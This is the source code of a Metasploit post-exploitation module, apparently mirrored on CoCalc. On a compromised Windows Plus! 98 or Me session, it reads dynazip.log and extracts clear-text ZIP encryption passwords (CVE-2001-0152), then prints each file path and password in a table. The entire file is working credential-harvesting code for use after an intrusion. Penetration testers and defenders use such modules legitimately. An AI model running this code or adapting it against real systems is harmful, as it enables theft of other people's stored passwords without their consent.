Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/dynazip_log.rb
19567 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Auxiliary::Report

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Windows Gather DynaZIP Saved Password Extraction',

15
        'Description' => %q{

16
          This module extracts clear text credentials from dynazip.log.

17
          The log file contains passwords used to encrypt compressed zip

18
          files in Microsoft Plus! 98 and Windows Me.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => ['bcoles'],

22
        'References' => [

23
          ['CVE', '2001-0152'],

24
          ['MSB', 'MS01-019'],

25
          ['PACKETSTORM', '24543'],

26
          ['URL', 'https://support.microsoft.com/en-us/kb/265131']

27
        ],

28
        'DisclosureDate' => '2001-03-27',

29
        'Platform' => ['win'],

30
        'SessionTypes' => ['meterpreter', 'shell'],

31
        'Notes' => {

32
          'Stability' => [CRASH_SAFE],

33
          'SideEffects' => [],

34
          'Reliability' => []

35
        }

36
      )

37
    )

38
  end

39


40
  def run

41
    creds = []

42


43
    log_path = "#{get_env('%WINDIR%')}\\dynazip.log"

44


45
    unless file?(log_path)

46
      print_error("#{log_path} not found")

47
      return

48
    end

49


50
    print_good("Found DynaZip log file: #{log_path}")

51


52
    begin

53
      log_data = read_file(log_path)

54
    rescue EOFError

55
      print_error('Log file is empty')

56
      return

57
    end

58


59
    vprint_status("Processing log file (#{log_data.length} bytes)")

60


61
    log_data.split('- DynaZIP ZIP Diagnostic Log -').each do |log|

62
      if log =~ /^lpszZIPFile: 0x[0-9a-f]+\s*?^(.+)\r\n/

63
        zip_path = ::Regexp.last_match(1)

64
      else

65
        next

66
      end

67


68
      vprint_status("Processing log entry for #{zip_path}")

69


70
      # The lpszEncryptCode appears to always be 0x712185d4 however

71
      # we use a hex regex pattern, just in case.

72
      # The line following the lpszEncryptCode contains the password.

73
      passwd = log.scan(/^lpszEncryptCode: 0x[0-9a-f]+\s*?^(.+)?\r\n/).flatten.first

74


75
      # In the event that the user selected a blank encryption password

76
      # the ZIP file is not encrypted, however an empty line is written

77
      # to the log file.

78
      if passwd.to_s.eql?('')

79
        vprint_status('Did not find a password')

80
        next

81
      end

82


83
      print_good("File: '#{zip_path}' -- Password: '#{passwd}'")

84
      creds << [zip_path, passwd]

85
    end

86


87
    if creds.empty?

88
      print_error('No passwords were found in the log file')

89
      return

90
    end

91


92
    table = Rex::Text::Table.new(

93
      'Header' => 'ZIP Passwords',

94
      'Indent' => 0,

95
      'SortIndex' => 0,

96
      'Columns' => ['File Path', 'Password']

97
    )

98
    creds.each { |c| table << c }

99
    print_line

100
    print_line(table.to_s)

101
  end

102
end

103


104